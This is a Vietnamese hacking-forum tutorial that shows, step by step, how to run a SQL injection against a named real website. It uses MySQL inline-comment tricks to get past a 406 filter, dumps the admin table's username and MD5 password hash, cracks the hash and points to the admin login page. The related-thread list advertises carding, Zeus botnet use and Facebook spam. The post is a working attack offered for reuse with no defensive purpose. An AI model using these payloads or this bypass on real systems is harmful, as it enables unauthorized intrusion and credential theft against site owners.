• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

[Tut] sql bypass 406 cực cơ bản cho newbie

Admin

Well-Known Member
Staff member
Administrator
Link lỗi:
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141
check lỗi thì ai cũng biết:
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141'
--> you have error in sql syntax ...blah blah blah
xóa dấu ' rồi order by đếm field thôi
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 1--
bình thường
....
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 9--
Unknown column '9' in 'order clause'
OK,vậy là có 8 field nhá
tìm field lỗi xem nào
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 union select 1,2,3,4,5,6,7,8--
bùm,406 Not Acceptable rồi,phải bypass thôi
h mình thêm /*!...*/ vô nha
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8--
ok,đã xuất hiện field lỗi
2,3,4,7,8 --> ai thích số nào thì chơi số đó nha,ở đây mình chọn đại số 2
mình thì quen chỉ check ver thôi,khỏi DB +user (pro đừng chém em)
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,version(),3,4,5,6,7,8--
5.1.56 -->thoải mái chiến
tiếp phần vui đây,get table nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
group_concat là lệnh để nối cụm lại thành 1 dòng với nhau nhá (dành cho newbie chưa biết)
Lại bị 406 Not Acceptable nữa àk
tìm coi nó chặn cái gì nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,/*!group_concat*/(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--
FUNCTION nutrangh_nutrang.group_concat does not exist. Check the 'Function Name Parsing and Resolution' section in the Reference Manual
àk thì ra nó chặn group_concat
vậy mình dùng concat thôi cũng được,mặc dù nó không liên kết vào 1 dòng
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--
Yeah,ra rồi kìa
ta chỉ cần để ý cái table "admin" thôi nhá
h có table name rồi thì tất nhiên ta phải đi tìm column name
đi hex cái "admin" ra trước đã
admin = 61646d696e
thêm vào 0x trước cái dãy hex đó nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where table_name=0x61646d696e--
ac ,lại là thằng 406 Not Acceptable đáng ghét!
àk thì ra quên bypass chỗ table_name
thêm /*!...*/ vào nha các bạn
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where /*!table_name*/=0x61646d696e--
rồi đó ,có column id,username,password
khai thác user+pass thôi là được rồi
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!username,0x2f,password*/),3,4,5,6,7,8 from admin--
các bạn lưu ý chỗ 0x2f nhá,2f là mã hex của dấu / thêm 0x vào để trong lúc query nó hiểu đó là mã hex thôi
nên khi coi các tut khác ,có nhiều pro sử dụng các dấu như ","(0x2c) ":"(0x3a)..v..v.. thì cũng đừng hỏi là gì mà hãy tự dịch mã hex đi nhé
àk quên mất mục đích chính ,dag khai thác mà nói nhiều quá,sr :D
sau khi thực hiện câu lệnh trên ta được :
adminoto/e10adc3949ba59abbe56e057f20f883e
adminoto :username của admin
e10adc3949ba59abbe56e057f20f883e : pass của admin ,decrypt md5 ra được là 123456 :| (thằng admin để pass vui tính nhỉ)
h chỉ còn tìm link admin thôi
HTML:
http://nutranghuongphat.com/admin/login.php

àk quên convert hex online ở trang này nhé (dành cho newbie):
HTML:
http://www.string-functions.com/string-hex.aspx
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Admin [Tut] sql dạng html Tut, tool, mmo 2
Admin Share seri video tut SQL inj vip SQL injection 0
Admin Share tut khai thác sql aspx bằng video SQL injection 0
Admin [TUT] Hướng dẫn lỗi sql injection cơ bản Security - Local - Hacking 0
Admin Tut SQL + up shell +local (tổng hợp) Thảo luận wap việt 3
Q Cần mua tut reg domain bằng CCN Hỏi đáp về domain & hosting 2
Admin Share tut bắn reach ads Facebook mới nhất dùng thẻ cứng Tut, tool, mmo 2
Admin Share tut ân hạn Facebook mới nhất 2020 Tut, tool, mmo 2
Admin Tut kháng Ad Breaks bị tắt kiếm tiền thành công Tut, tool, mmo 0
Admin Share một số tut chiến Facebook Ad Breaks theo kinh nghiệm Tut, tool, mmo 0
S [Tut]Basic Hacking - Hacking cơ bản Exploit 0
Smobi Share [Tut] Làm một vật trở nên trong suốt bằng PTS Thiết kế đồ họa 0
KhangSkull [TUT] Khai thác SQLi dạng .html SQL injection 0
Admin Tut reseller domain không die Tut, tool, mmo 1
Admin Share video tut reg domain quốc tế free bằng ccv thực vật Tut, tool, mmo 0
Hero Share TUT Local Full 2012 Tut, tool, mmo 6
Admin [Tut] hack bạn gái cho it Thơ, báo, tạp chí 2
H Tut Hack Card Viettel Số Lượng Ko Giới Hạn Trò chuyện linh tinh 14
Admin Share Tut Spam Facebook Tut, tool, mmo 0
blog4me Share Tổng hợp một số TUT chơi CC Security - Local - Hacking 2
S TUT Vps Free 1 Tháng VPS & Dedicated Server 1
Myshare Share Tut hướng dẫn add site(tên miền) lên google Hosting / Domain 0
Admin Share tut reg domain .vn 2013 - nhanh không nát Tut, tool, mmo 3
Hero [TUT] Reg Domain, VPS, Hosting Đủ Loại Security - Local - Hacking 11
Admin Share tut đâm domain .my free 1-5 year Tut, tool, mmo 2
Admin Share Tut Hosting Pháp Disk 512mb Bw Unlimited Tut, tool, mmo 0
Admin Share tut reg domain bằng ccv, ccn 1-10 years Tut, tool, mmo 2
Admin Share tut ship giầy nhầm nước Tut, tool, mmo 5
V Hướng dẫn [TUT] Gửi email từ localhost bằng Mercury Mail VPS & Dedicated Server 0
V Share [Cash Out] Tut site cash PP&CC về PPVN đang được thịnh hành Hacking 0
V Share [Tut] Fake Ip từ A đến Z Hacking 0
V Share [Tut] Hack site lỗi SQLi với Havij + Up shell - Guan™ Hacking 0
V Share [TUT] sữ dụng Botnet ZEUS chi tiết Hacking 0
K Xin anh em co tut an gift Hacking 0
S [tut] domain .*** free = ccn Hosting & Domain Free 0
J Share [Tut] Fake Ip từ A đến Z Security - Local - Hacking 0
S Share [Shipping Tut] Key KIS 2012, KIS 2013, NIS 2012, MS.... Hacking 1
Admin [Tut] domain yahoo 5 năm Tut, tool, mmo 15
X Share [TUT] Đăng kí domain .me 1 năm miễn phí Hosting & Domain Free 14
Admin Share tut ship nước hoa bằng ccv Tut, tool, mmo 7
V [TUT] VPS Win/Linux UK VPS & Dedicated Server 6
Admin [Tut] Case iPhone+clo Tut, tool, mmo 2
Admin [Tut] reg domain .me miễn phí 100% Tut, tool, mmo 3
V [TUT] quần áo chơi chơi lẤy ccv Tut, tool, mmo 30
V [Tut] Áo phông Nam nữ direct free tax 2 Tut, tool, mmo 2
Admin 200 tut của hce Tut, tool, mmo 3
Admin [Tut] cách chọn size để ship đồ Tut, tool, mmo 0
Admin [Tut] bypass admin cpanel Tut, tool, mmo 0
Admin [Video tut] “hack facebook” tut tiếc cho bằng anh bằng em Hacking 0
S tut tạo yahoo bằng số mr.reeon Sử dụng, chia sẻ, hỏi đáp 1

Similar threads

New posts New threads New resources

Back
Top